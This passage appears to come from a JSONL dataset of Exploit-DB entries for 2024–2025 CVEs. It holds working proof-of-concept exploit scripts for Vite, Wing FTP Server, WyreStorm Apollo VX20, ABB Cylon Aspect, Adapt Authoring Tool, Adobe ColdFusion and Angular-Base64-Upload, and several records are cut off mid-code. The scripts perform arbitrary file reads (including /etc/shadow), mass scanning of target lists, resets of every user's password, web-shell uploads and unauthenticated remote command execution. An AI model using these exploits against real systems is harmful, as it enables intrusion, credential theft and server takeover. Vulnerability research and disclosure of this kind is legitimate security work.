frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.\n\"\"\"\n\nimport requests\nimport argparse\nimport urllib3\nfrom colorama import Fore, Style\n\n# Disable SSL warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef check_vulnerability(target, file_path, verbose=False, output=None):\n url = f\"{target}{file_path}?raw\"\n print(f\"{Fore.CYAN}[*] Testing: {url}{Style.RESET_ALL}\")\n\n try:\n response = requests.get(url, timeout=5, verify=False) # Ignore SSL verification\n if response.status_code == 200 and response.text:\n vuln_message = f\"{Fore.GREEN}[+] Vulnerable : {url}{Style.RESET_ALL}\"\n print(vuln_message)\n\n if verbose:\n print(f\"\\n{Fore.YELLOW}--- File Content Start ---{Style.RESET_ALL}\")\n print(response.text[:500]) # Print first 500 characters for safety\n print(f\"{Fore.YELLOW}--- File Content End ---{Style.RESET_ALL}\\n\")\n\n if output:\n with open(output, 'a') as f:\n f.write(f\"{url}\\n\")\n else:\n print(f\"{Fore.RED}[-] Not vulnerable or file does not exist: {url}{Style.RESET_ALL}\")\n except requests.exceptions.RequestException as e:\n print(f\"{Fore.YELLOW}[!] Error testing {url}: {e}{Style.RESET_ALL}\")\n\ndef check_multiple_domains(file_path, file_to_read, verbose, output):\n try:\n with open(file_to_read, 'r') as file:\n domains = file.readlines()\n for domain in domains:\n domain = domain.strip()\n if domain:\n check_vulnerability(domain, file_path, verbose, output)\n except FileNotFoundError:\n print(f\"{Fore.RED}[!] Error: The file '{file_to_read}' does not exist.{Style.RESET_ALL}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"PoC for CVE-2025-30208 - Vite Arbitrary File Read\")\n parser.add_argument(\"target\", nargs=\"?\", help=\"Target URL (e.g., http://localhost:5173)\")\n parser.add_argument(\"-l\", \"--list\", help=\"File containing list of domains\")\n parser.add_argument(\"-f\", \"--file\", default=\"/etc/passwd\", help=\"File path to read (default: /etc/passwd)\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Show file content if vulnerable\")\n parser.add_argument(\"-o\", \"--output\", help=\"Output file to save vulnerable URLs\")\n\n args = parser.parse_args()\n\n if args.list:\n check_multiple_domains(args.file, args.list, args.verbose, args.output)\n elif args.target:\n check_vulnerability(args.target, args.file, verbose=args.verbose, output=args.output)\n else:\n print(f\"{Fore.RED}Please provide a target URL or a domain list file.{Style.RESET_ALL}\")", "cve_id": "CVE-2025-30208", "source": "exploitdb", "timestamp": "2025-04-03T00:00:00+00:00"} {"id": "c779b1a6469663e61c3d", "text": "Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)\n\n# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)\n# CVE: CVE-2025-47812\n# Date: 2025-06-30\n# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)\n# Vendor Homepage: https://www.wftpserver.com/\n# Version: Wing FTP Server <= 7.4.3\n# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)\n\n# Description:\n# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)\n# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username'\n# parameter during login, leading to Lua code injection into session files. These maliciously crafted\n# session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed,\n# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows).\n# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL)\n# and the session creation logic (which uses the full unsanitized username).\n\n# Proof-of-Concept (Python):\n# The provided Python script automates the exploitation process.\n# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html.\n# Upon successful authentication (even anonymous), a UID cookie is returned.\n# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code,\n# leading to RCE.\n\n\nimport requests\nimport re\nimport argparse\n\n# ANSI color codes\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nRESET = \"\\033[0m\"\n\ndef print_green(text):\n print(f\"{GREEN}{text}{RESET}\")\n\ndef print_red(text):\n print(f\"{RED}{text}{RESET}\")\n\ndef run_exploit(target_url, command, username=\"anonymous\", verbose=False):\n login_url = f\"{target_url}/loginok.html\"\n\n login_headers = {\n \"Host\": target_url.split('//')[1].split('/')[0],\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Origin\": target_url,\n \"Connection\": \"keep-alive\",\n \"Referer\": f\"{target_url}/login.html?lang=english\",\n \"Cookie\": \"client_lang=english\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Priority\": \"u=0, i\"\n }\n\n\n from urllib.parse import quote\n encoded_username = quote(username)\n\n payload = (\n f\"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\\\"{command}\\\")%0dlocal+r+%3d+h%3aread(\\\"*a\\\")\"\n \"%0dh%3aclose()%0dprint(r)%0d--&password=\"\n )\n\n if verbose:\n print_green(f\"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'\")\n\n try:\n login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10)\n login_response.raise_for_status()\n except requests.exceptions.RequestException as e:\n print_red(f\"[-] Error sending POST request to {login_url}: {e}\")\n return False\n\n set_cookie = login_response.headers.get(\"Set-Cookie\", \"\")\n match = re.search(r'UID=([^;]+)', set_cookie)\n\n if not match:\n print_red(\"[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.\")\n return False\n\n uid = match.group(1)\n if verbose:\n print_green(f\"[+] UID extracted: {uid}\")\n\n dir_url = f\"{target_url}/dir.html\"\n dir_headers = {\n \"Host\": login_headers[\"Host\"],\n \"User-Agent\": login_headers[\"User-Agent\"],\n \"Accept\": login_headers[\"Accept\"],\n \"Accept-Language\": login_headers[\"Accept-Language\"],\n \"Accept-Encoding\": login_headers[\"Accept-Encoding\"],\n \"Connection\": \"keep-alive\",\n \"Cookie\": f\"UID={uid}\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Priority\": \"u=0, i\"\n }\n\n if verbose:\n print_green(f\"[+] Sending GET request to {dir_url} with UID: {uid}\")\n\n try:\n dir_response = requests.get(dir_url, headers=dir_headers, timeout=10)\n dir_response.raise_for_status()\n except requests.exceptions.RequestException as e:\n print_red(f\"[-] Error sending GET request to {dir_url}: {e}\")\n return False\n\n body = dir_response.text\n clean_output = re.split(r'<\\?xml', body)[0].strip()\n\n if verbose:\n print_green(\"\\n--- Command Output ---\")\n print(clean_output)\n print_green(\"----------------------\")\n else:\n if clean_output:\n print_green(f\"[+] {target_url} is vulnerable!\")\n else:\n print_red(f\"[-] {target_url} is NOT vulnerable.\")\n\n return bool(clean_output)\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Exploit script for command injection via login.h", "cve_id": "CVE-2025-47812", "source": "exploitdb", "timestamp": "2025-07-02T00:00:00+00:00"} {"id": "fbfa099f64245df88185", "text": "Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration\n\n[+] Credits: John Page (aka hyp3rlinx)\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt\n[+] twitter.com/hyp3rlinx\n[+] ISR: ApparitionSec\n\n\n[Vendor]\nwww.wyrestorm.com\n\n\n[Product]\nAPOLLO VX20 < 1.3.58\n\n[Vulnerability Type]\nAccount Enumeration\n\n\n[CVE Reference]\nCVE-2024-25734\n\n\n[Security Issue]\nAn issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.\nAttackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.\n\n\n[Exploit/POC]\nTELNET x.x.x.x 23\nusername:aa\nusername:bb\nusername:admin\npassword:\n\n\n[Network Access]\nRemote\n\n\n[Affected Product Code Base]\nAPOLLO VX20 - < 1.3.58, fixed in v1.3.58\n\n\n[Severity]\nMedium\n\n\n[Disclosure Timeline]\nVendor Notification: January 18, 2024\nVendor released fixed firmware v1.3.58: February 2, 2024\nFebruary 11, 2024 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "cve_id": "CVE-2024-25734", "source": "exploitdb", "timestamp": "2024-02-26T00:00:00+00:00"} {"id": "14a9fbc969da4d7aea15", "text": "Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'\n\n[+] Credits: John Page (aka hyp3rlinx)\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt\n[+] twitter.com/hyp3rlinx\n[+] ISR: ApparitionSec\n\n\n[Vendor]\nwww.wyrestorm.com\n\n\n[Product]\nAPOLLO VX20 < 1.3.58\n\n\n[Vulnerability Type]\nIncorrect Access Control (Credentials Disclosure)\n\n\n[Affected Component]\nWeb interface, config\n\n\n[Affected Product Code Base]\nAPOLLO VX20 < 1.3.58, fixed in v1.3.58\n\n\n[CVE Reference]\nCVE-2024-25735\n\n\n[Security Issue]\nAn issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.\nRemote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\nThe credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config\n\nE.g. HTTP response snippet:\n\n:{\"enable\":\"y\",\"oncmd\":\"8004\",\"offcmd\":\"8036\"}},\"screen\":\"dual\",\"ipconflict\":\"y\",\"wifi\":{\"auto\":\"y\",\"band\":\"5\",\"channel\":\"153\"}\n,\"softAp\":{\"password\":\"12345678\",\"router\":\"y\",\"softAp\":\"y\"}...\n\n\n[Exploit/POC]\nimport requests\n\ntarget=\"https://x.x.x.x\"\nres = requests.get(target+\"/device/config\", verify=False)\n\nidx=res.content.find('{\"password\":')\nif idx != -1:\n idx2=res.content.find('router')\n if idx2 != -1:\n print(\"[+] CVE-2024-25735 Credentials Disclosure\")\n print(\"[+] \" + res.content[idx + 1:idx2 + 11])\n print(\"[+] hyp3rlinx\")\nelse:\n print(\"[!] Apollo vX20 Device not vulnerable...\")\n\n\n\n[Network Access]\nRemote\n\n\n[Severity]\nHigh\n\n\n[Disclosure Timeline]\nVendor Notification: January 18, 2024\nVendor released fixed firmware v1.3.58: February 2, 2024\nFebruary 11, 2024 : Public Disclosure\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "cve_id": "CVE-2024-25735", "source": "exploitdb", "timestamp": "2024-02-26T00:00:00+00:00"} {"id": "7049b29c591b38123779", "text": "ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)\n\n# Exploit Title : ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)\n\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.01\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB BMS/BAS controller suffers from a remote code execution\nvulnerability. The vulnerable uploadFile() function in bigUpload.php\nimproperly reads raw POST data using the php://input wrapper without\nsufficient validation. This data is passed to the fwrite() function,\nallowing arbitrary file writes. Combined with an improper sanitization\nof file paths, this leads to directory traversal, allowing an attacker\nto upload malicious files to arbitrary locations. Once a malicious file\nis written to an executable directory, an authenticated attacker can\ntrigger the file to execute code and gain unauthorized access to the\nbuilding controller.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2024-5828\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php\nCVE ID: CVE-2024-6298\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n1.\n$ curl -X POST \"http://192.168.73.31/bigUpload.php?action=upload&key=251\" \\\n> -H \"Cookie: PHPSESSID=25131337\" \\\n> -H \"Content-Type: application/x-www-form-urlencoded\" \\\n> -d \"\"\n\n2.\n$ curl -X POST \"http://192.168.73.31/bigUpload.php?action=upload&key=251\" \\\n> -H \"Cookie: PHPSESSID=25131337\" \\\n> –H \"Content-Type: application/x-www-form-urlencoded\"\n\n3.\n$ curl -X POST \"http://192.168.73.31/bigUpload.php?action=finish\" \\\n> -H \"Cookie: PHPSESSID=25131337\" \\\n> -H \"Content-Type: application/x-www-form-urlencoded\" \\\n> -d \"key=251&name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php\"\n\n4.\n$ curl http://192.168.73.31/ZSL.php?j=id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)", "cve_id": "CVE-2024-6298", "source": "exploitdb", "timestamp": "2025-04-02T00:00:00+00:00"} {"id": "5267f0b07f4cc08f2263", "text": "Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)\n\n# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)\n# Date: 2024-11-24\n# Exploit Author: Eui Chul Chung\n# Vendor Homepage: https://www.adaptlearning.org/\n# Software Link: https://github.com/adaptlearning/adapt_authoring\n# Version: 0.11.3\n# CVE Identifier: CVE-2024-50672 , CVE-2024-50671\n\nimport io\nimport sys\nimport json\nimport zipfile\nimport argparse\nimport requests\nimport textwrap\n\n\ndef get_session_cookie(username, password):\n data = {\"email\": username, \"password\": password}\n res = requests.post(f\"{args.url}/api/login\", data=data)\n\n if res.status_code == 200:\n print(f\"[+] Login as {username}\")\n return res.cookies.get_dict()\n\n return None\n\n\ndef get_users():\n session_cookie = get_session_cookie(args.username, args.password)\n if session_cookie is None:\n print(\"[-] Login failed\")\n sys.exit()\n\n res = requests.get(f\"{args.url}/api/user\", cookies=session_cookie)\n users = [\n {\"email\": user[\"email\"], \"role\": user[\"roles\"][0][\"name\"]}\n for user in json.loads(res.text)\n ]\n\n roles = {\"Authenticated User\": 1, \"Course Creator\": 2, \"Super Admin\": 3}\n users.sort(key=lambda user: roles[user[\"role\"]])\n for user in users:\n print(f\"[+] {user['email']} ({user['role']})\")\n\n return users\n\n\ndef reset_password(users):\n # Overwrite potentially expired password reset tokens\n for user in users:\n data = {\"email\": user[\"email\"]}\n requests.post(f\"{args.url}/api/createtoken\", data=data)\n print(\"[+] Generate password reset token for every user\")\n\n valid_characters = \"0123456789abcdef\"\n next_tokens = [\"^\"]\n\n # Ensure that only a single result is returned at a time\n while next_tokens:\n prev_tokens = next_tokens\n next_tokens = []\n\n for token in prev_tokens:\n for ch in valid_characters:\n data = {\"token\": {\"$regex\": token + ch}, \"password\": \"HaXX0r3d!\"}\n res = requests.put(\n f\"{args.url}/api/userpasswordreset/w00tw00t\",\n json=data,\n )\n\n # Multiple results returned\n if res.status_code == 500:\n next_tokens.append(token + ch)\n\n print(\"[+] Reset every password to HaXX0r3d!\")\n\n\ndef create_plugin(plugin_name):\n manifest = {\n \"name\": plugin_name,\n \"version\": \"1.0.0\",\n \"extension\": \"exploit\",\n \"main\": \"/js/main.js\",\n \"displayName\": \"exploit\",\n \"keywords\": [\"adapt-plugin\", \"adapt-extension\"],\n \"scripts\": {\"adaptpostcopy\": \"/scripts/postcopy.js\"},\n }\n\n property = {\n \"properties\": {\n \"pluginLocations\": {\n \"type\": \"object\",\n \"properties\": {\"course\": {\"type\": \"object\"}},\n }\n }\n }\n\n payload = textwrap.dedent(\n f\"\"\"\n const {{ exec }} = require(\"child_process\");\n\n module.exports = async function (fs, path, log, options, done) {{\n try {{\n exec(\"{args.command}\");\n }} catch (err) {{\n log(err);\n }}\n done();\n }};\n \"\"\"\n ).strip()\n\n plugin = io.BytesIO()\n with zipfile.ZipFile(plugin, \"a\", zipfile.ZIP_DEFLATED, False) as zip_file:\n zip_file.writestr(\n f\"{plugin_name}/bower.json\",\n io.BytesIO(json.dumps(manifest).encode()).getvalue(),\n )\n zip_file.writestr(\n f\"{plugin_name}/properties.schema\",\n io.BytesIO(json.dumps(property).encode()).getvalue(),\n )\n zip_file.writestr(\n f\"{plugin_name}/js/main.js\", io.BytesIO(\"\".encode()).getvalue()\n )\n zip_file.writestr(\n f\"{plugin_name}/scripts/postcopy.js\",\n io.BytesIO(payload.encode()).getvalue(),\n )\n\n plugin.seek(0)\n return plugin\n\n\ndef find_plugin(cookies, plugin_type, plugin_name):\n res = requests.get(f\"{args.url}/api/{plugin_type}type\", cookies=cookies)\n for plugin in json.loads(res.text):\n if plugin[\"name\"] == plugin_name:\n return plugin[\"_id\"]\n\n return None\n\n\ndef create_course(cookies):\n data = {}\n res = requests.post(f\"{args.url}/api/content/course\", cookies=cookies, json=data)\n course_id = json.loads(res.text)[\"_id\"]\n\n data = {\"_courseId\": course_id, \"_parentId\": course_id}\n res = requests.post(\n f\"{args.url}/api/content/contentobject\",\n cookies=cookies,\n json=data,\n )\n content_id = json.loads(res.text)[\"_id\"]\n\n data = {\"_courseId\": course_id, \"_parentId\": content_id}\n res = requests.post(f\"{args.url}/api/content/article\", cookies=cookies, json=data)\n article_id = json.loads(res.text)[\"_id\"]\n\n data = {\"_courseId\": course_id, \"_parentId\": article_id}\n res = requests.post(f\"{args.url}/api/content/block\", cookies=cookies, json=data)\n block_id = json.loads(res.text)[\"_id\"]\n\n component_id = find_plugin(cookies, \"component\", \"adapt-contrib-text", "cve_id": "CVE-2024-50672", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "7359181e9154a879f6d2", "text": "Adobe ColdFusion 2023.6 - Remote File Read\n\n# Exploit Title: Adobe ColdFusion 2023.6 - Remote File Read\n# Exploit Author: @İbrahimsql\n# Exploit Author's github: https://github.com/ibrahmsql\n# Description: ColdFusion 2023 (LUcee) - Remote Code Execution\n# CVE: CVE-2024-20767\n# Vendor Homepage: https://www.adobe.com/\n# Requirements: requests>=2.25.0, urllib3>=1.26.0\n# Usage: python3 CVE-2024-20767.py -u http://target.com -f /etc/passwd\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport urllib3\nimport requests\nimport argparse\nfrom urllib.parse import urlparse\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nurllib3.disable_warnings()\n\nclass ColdFusionExploit:\n def __init__(self, output_file=None, port=8500):\n self.output_file = output_file\n self.port = port\n self.verbose = True\n self.session = requests.Session()\n\n def print_status(self, message, status=\"*\"):\n colors = {\"+\": \"\\033[92m\", \"-\": \"\\033[91m\", \"*\": \"\\033[94m\", \"!\": \"\\033[93m\"}\n reset = \"\\033[0m\"\n print(f\"{colors.get(status, '')}{status} {message}{reset}\")\n\n def normalize_url(self, url):\n if not url.startswith(('http://', 'https://')):\n url = f\"http://{url}\"\n parsed = urlparse(url)\n if not parsed.port:\n url = f\"{url}:{self.port}\"\n return url.rstrip('/')\n\n def get_uuid(self, url):\n endpoint = \"/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat\"\n try:\n response = self.session.get(f\"{url}{endpoint}\", verify=False, timeout=10)\n if response.status_code == 200:\n match = re.search(r\"(.+?)\", response.text)\n if match:\n uuid = match.group(1)\n if self.verbose:\n self.print_status(f\"UUID: {uuid[:8]}...\", \"+\")\n return uuid\n except Exception as e:\n if self.verbose:\n self.print_status(f\"Error: {e}\", \"-\")\n return None\n\n def read_file(self, url, uuid, file_path):\n headers = {\"uuid\": uuid}\n endpoint = f\"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100\"\n try:\n response = self.session.get(f\"{url}{endpoint}\", verify=False, headers=headers, timeout=10)\n if response.status_code == 200 and response.text.strip() != \"[]\":\n return response.text\n except:\n pass\n return None\n\n def test_files(self, url, uuid):\n files = {\n \"Linux\": [\"etc/passwd\", \"etc/shadow\", \"etc/hosts\"],\n \"Windows\": [\"Windows/win.ini\", \"Windows/System32/drivers/etc/hosts\", \"boot.ini\"]\n }\n\n for os_name, file_list in files.items():\n for file_path in file_list:\n content = self.read_file(url, uuid, file_path)\n if content:\n self.print_status(f\"VULNERABLE: {url} - {os_name} - {file_path}\", \"+\")\n if self.verbose:\n print(content[:200] + \"...\" if len(content) > 200 else content)\n print(\"-\" * 50)\n if self.output_file:\n with open(self.output_file, \"a\") as f:\n f.write(f\"{url} - {os_name} - {file_path}\\n\")\n return True\n return False\n\n def exploit_custom_file(self, url, uuid, custom_file):\n content = self.read_file(url, uuid, custom_file)\n if content:\n self.print_status(f\"File read: {custom_file}\", \"+\")\n print(content)\n return True\n else:\n self.print_status(f\"Failed to read: {custom_file}\", \"-\")\n return False\n\n def exploit(self, url, custom_file=None):\n url = self.normalize_url(url)\n if self.verbose:\n self.print_status(f\"Testing: {url}\")\n\n uuid = self.get_uuid(url)\n if not uuid:\n if self.verbose:\n self.print_status(f\"No UUID: {url}\", \"-\")\n return False\n\n if custom_file:\n return self.exploit_custom_file(url, uuid, custom_file)\n else:\n return self.test_files(url, uuid)\n\n def scan_file(self, target_file, threads):\n if not os.path.exists(target_file):\n self.print_status(f\"File not found: {target_file}\", \"-\")\n return\n\n with open(target_file, \"r\") as f:\n urls = [line.strip() for line in f if line.strip() and not line.startswith('#')]\n\n self.print_status(f\"Scanning {len(urls)} targets with {threads} threads\")\n self.verbose = False\n\n vulnerable = 0\n with ThreadPoolExecutor(max_workers=threads) as executor:\n futures = {executor.submit(self.exploit, url): url for url in urls}\n for future in as_completed(futures):\n url = futures[future]\n try:\n ", "cve_id": "CVE-2024-20767", "source": "exploitdb", "timestamp": "2025-07-28T00:00:00+00:00"} {"id": "906e64a9e4c41dc75108", "text": "Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)\n\n# Exploit Title: Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)\n# Date: 10 October 2024\n# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)\n# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)\n# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload\n# Software Link: https://github.com/adonespitogo/angular-base64-upload\n# Version: prior to v0.1.21\n# Tested on: Arch Linux\n# CVE : CVE-2024-42640\n# Severity: Critical - 10.0 (CVSS 4.0)\n# Github Link : https://github.com/rvizx/CVE-2024-42640\n# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html\n\nimport re\nimport subprocess\nimport requests\nimport sys\nimport os\nimport uuid\nimport base64\nimport cmd\nfrom urllib.parse import urlparse\n\n\ndef banner():\n print('''\n\n \\033[2mCVE-2024-42640\\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \\033[2m PoC Exploit\n \\033[0mRavindu Wickramasinghe\\033[2m | rvz (ラヴィズ) - twitter: @rvizx9\n https://github.com/rvizx/\\033[0mCVE-2024-42640\n\n''')\n\n\ndef check_version(target):\n response = requests.get(target)\n first_line = response.text.splitlines()[0].strip()\n match = re.search(r'v0\\.(1|0)\\.(\\d+)', first_line)\n\n if match:\n version = match.group(0)\n x_value = int(match.group(1))\n if x_value <= 20:\n print(f\"\\033[94m[inf]:\\033[0m target is using a vulnerable version. [version]: {version}\")\n else:\n print(f\"\\033[91m[err]:\\033[0m target is not vulnerable [version]: {version}\")\n exit()\n else:\n print(\"\\033[91m[err]:\\033[0m couldn't find the version\")\n\n\ndef enum(url):\n print(\"\\033[94m[inf]:\\033[0m enumerating... \")\n target = f\"{url}/bower_components/angular-base64-upload/dist/angular-base64-upload.min.js\"\n r = requests.head(target)\n if r.status_code == 200:\n print(\"\\033[94m[inf]:\\033[0m target is using bower_components\")\n check_version(target)\n else:\n print(\"\\033[94m[inf]:\\033[0m target is not using bower_components\")\n target = f\"{url}/node_modules/angular-base64-upload/dist/angular-base64-upload.min.js\"\n r = requests.head(target)\n if r.status_code == 200:\n print(\"\\033[94m[inf]:\\033[0m target is using node_modules\")\n check_version(target)\n else:\n print(\"\\033[94m[inf]:\\033[0m target is not using node_modules\")\n print(\"\\033[91m[err]:\\033[0m an error occured, it was not possible to enumerate for dist/angular-base64-upload.min.js\")\n print(\"\\033[93m[ins]:\\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory\")\n print(\"\\033[93m[ins]:\\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html\")\n print(\"\\033[91m[err]:\\033[0m exiting..\")\n exit()\n exploit(target)\n\n\nclass CmdShell(cmd.Cmd):\n username = subprocess.check_output(\"whoami\", shell=True).strip().decode()\n domain = urlparse(sys.argv[1]).netloc\n prompt = f\"{username}@{domain} > \"\n\n def __init__(self, payload_url):\n super().__init__()\n self.payload_url = payload_url\n\n def default(self, line):\n url = f\"{self.payload_url}?cmd={line}\"\n try:\n response = requests.get(url)\n print(response.text)\n except requests.RequestException as e:\n print(\"\\033[91m[err]:\\033[0m {e}\")\n\n def do_exit(self, arg):\n return True\n\ndef exploit(target):\n print(f\"[dbg]: {target}\")\n target_server_url = target.replace(\"dist/angular-base64-upload.min.js\",\"demo/server.php\")\n print(f\"[dbg]: {target_server_url}\")\n payload_name = 